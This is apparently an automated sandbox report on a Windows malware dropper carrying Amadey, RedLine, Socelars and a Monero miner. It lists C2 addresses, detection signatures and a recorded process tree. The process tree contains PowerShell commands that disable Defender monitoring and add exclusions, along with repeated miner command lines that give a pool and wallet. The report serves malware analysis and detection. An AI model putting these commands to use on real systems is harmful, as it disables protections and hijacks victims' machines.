amadey | 523c3d9d49ff39f7f97331e9d89c18053ab85c80f2ead0b505cc7e27e7aa2fcd

Analysis

max time kernel
15s
max time network
152s
platform
windows7_x64
resource
win7-en-20211208
submitted
17-01-2022 19:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe
Size

16.5MB
MD5

5dd3e68bd9215565b7321224c3594ee7
SHA1

2db6bb30e9ac1e94cc50a42a2b9a6dfdd79a3c56
SHA256

523c3d9d49ff39f7f97331e9d89c18053ab85c80f2ead0b505cc7e27e7aa2fcd
SHA512

1382558c7d20afe3906e949cb7c5fb70fe3948d3722feb09590450fb6188773642324d4d037c4ec6bf20843a309b1d065fd03de4dc097965eba4390b2dff7b3f

Score

10^/10

amadey loaderbot redline socelars @tui aspackv2 infostealer loader miner stealer suricata trojan

Malware Config

Extracted

Family

socelars

http://www.wgqpw.com/

Extracted

Family

redline

Botnet

@Tui

185.215.113.44:23759

Extracted

Family

amadey

Version

2.85

185.215.113.35/d2VxjasuwS/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2236	620	rundll32.exe	68

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral1/memory/1452-200-0x0000000000400000-0x00000000007FA000-memory.dmp	family_redline
behavioral1/memory/1452-247-0x0000000000400000-0x00000000007FA000-memory.dmp	family_redline
behavioral1/memory/1452-251-0x0000000000400000-0x00000000007FA000-memory.dmp	family_redline
behavioral1/memory/3040-368-0x0000000000418F22-mapping.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0006000000013a0f-101.dat	family_socelars

suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/files/0x0005000000014141-105.dat	WebBrowserPassView

Nirsoft 2 IoCs

resource	yara_rule
behavioral1/files/0x0005000000014141-105.dat	Nirsoft
behavioral1/memory/2340-286-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0007000000013306-65.dat	aspack_v212_v242
behavioral1/files/0x0007000000013306-64.dat	aspack_v212_v242
behavioral1/files/0x0007000000013327-63.dat	aspack_v212_v242
behavioral1/files/0x0007000000013327-62.dat	aspack_v212_v242
behavioral1/files/0x0006000000013925-69.dat	aspack_v212_v242
behavioral1/files/0x0006000000013925-68.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 5 IoCs

pid	Process
1548	setup_install.exe
1300	Mon114440e0de.exe
592	Mon11e659572da2322be.exe
432	Mon114fa4a184d43.exe
1816	Mon114440e0de.exe

Loads dropped DLL 25 IoCs

pid	Process
960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe
960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe
960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe
1548	setup_install.exe
1548	setup_install.exe
1548	setup_install.exe
1548	setup_install.exe
1548	setup_install.exe
1548	setup_install.exe
1548	setup_install.exe
1548	setup_install.exe
1640	cmd.exe
1640	cmd.exe
1524	cmd.exe
1524	cmd.exe
1300	Mon114440e0de.exe
1300	Mon114440e0de.exe
592	Mon11e659572da2322be.exe
592	Mon11e659572da2322be.exe
612	cmd.exe
432	Mon114fa4a184d43.exe
1300	Mon114440e0de.exe
432	Mon114fa4a184d43.exe
1816	Mon114440e0de.exe
1816	Mon114440e0de.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ipinfo.io
18	ipinfo.io
21	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2560	432	WerFault.exe	55
1668	2184	WerFault.exe	73

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2344	schtasks.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 960 wrote to memory of 1548	960	523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe	27
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1040	1548	setup_install.exe	30
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1784	1548	setup_install.exe	29
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1640	1548	setup_install.exe	31
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 1524	1548	setup_install.exe	56
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 612	1548	setup_install.exe	32
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1676	1548	setup_install.exe	54
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1624	1548	setup_install.exe	33
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1380	1548	setup_install.exe	53
PID 1548 wrote to memory of 1284	1548	setup_install.exe	34

C:\Users\Admin\AppData\Local\Temp\523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe
"C:\Users\Admin\AppData\Local\Temp\523C3D9D49FF39F7F97331E9D89C18053AB85C80F2EAD.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:960
- C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    PID:1784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
    3⤵
    PID:1040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      PID:1764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon114440e0de.exe
    3⤵
    - Loads dropped DLL
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon114440e0de.exe
      Mon114440e0de.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1300
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon114440e0de.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon114440e0de.exe" -u
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon114fa4a184d43.exe
    3⤵
    - Loads dropped DLL
    PID:612
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon114fa4a184d43.exe
      Mon114fa4a184d43.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:432
    - - C:\Users\Admin\Pictures\Adobe Films\JhCnPDjPrP4_FSRkoTNLlC8v.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JhCnPDjPrP4_FSRkoTNLlC8v.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1512
        5⤵
        Program crash
        
        PID:2560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1169c0a56d9eb.exe
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe
      Mon1169c0a56d9eb.exe
      4⤵
      PID:1332
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe"
        5⤵
        
        PID:2992
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe"
        5⤵
        
        PID:1272
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe"
        5⤵
        
        PID:1388
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1169c0a56d9eb.exe"
        5⤵
        
        PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1120f067452a33.exe
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11619af2c4.exe /mixtwo
    3⤵
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11619af2c4.exe
      Mon11619af2c4.exe /mixtwo
      4⤵
      PID:600
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11619af2c4.exe
        
        Mon11619af2c4.exe /mixtwo
        5⤵
        
        PID:2184
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 484
        6⤵
        Program crash
        
        PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1151dacf45.exe
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon1151dacf45.exe
      Mon1151dacf45.exe
      4⤵
      PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon114136c10c.exe
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11eea98e3f.exe
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11eea98e3f.exe
      Mon11eea98e3f.exe
      4⤵
      PID:2148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11e6010c5715aef.exe
    3⤵
    PID:520
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11e6010c5715aef.exe
      Mon11e6010c5715aef.exe
      4⤵
      PID:2000
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11e6010c5715aef.exe
        
        Mon11e6010c5715aef.exe
        5⤵
        
        PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1111453426c5.exe
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11c48e16249a7bd9.exe
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11c48e16249a7bd9.exe
      Mon11c48e16249a7bd9.exe
      4⤵
      PID:2416
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11c48e16249a7bd9.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11c48e16249a7bd9.exe
        5⤵
        
        PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon115336815be3eca.exe
    3⤵
    PID:1312
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon115336815be3eca.exe
      Mon115336815be3eca.exe
      4⤵
      PID:428
    - - C:\Users\Admin\AppData\Local\Temp\is-DKGR0.tmp\Mon115336815be3eca.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DKGR0.tmp\Mon115336815be3eca.tmp" /SL5="$D0152,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon115336815be3eca.exe"
        5⤵
        
        PID:2748
      - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon115336815be3eca.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon115336815be3eca.exe" /SILENT
        6⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\is-6CGO6.tmp\Mon115336815be3eca.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6CGO6.tmp\Mon115336815be3eca.tmp" /SL5="$50156,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon115336815be3eca.exe" /SILENT
        7⤵
        
        PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11f1fa3e5029cce73.exe
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11f1fa3e5029cce73.exe
      Mon11f1fa3e5029cce73.exe
      4⤵
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\RaptorMiner.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RaptorMiner.exe"
        5⤵
        
        PID:2708
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2036
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:3016
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1736
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2772
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2692
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1984
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2860
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1120
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1004
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2420
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:3064
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1656
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2808
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1104
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1564
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2692
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2272
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2724
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:748
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2688
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:884
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2704
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2604
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1272
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
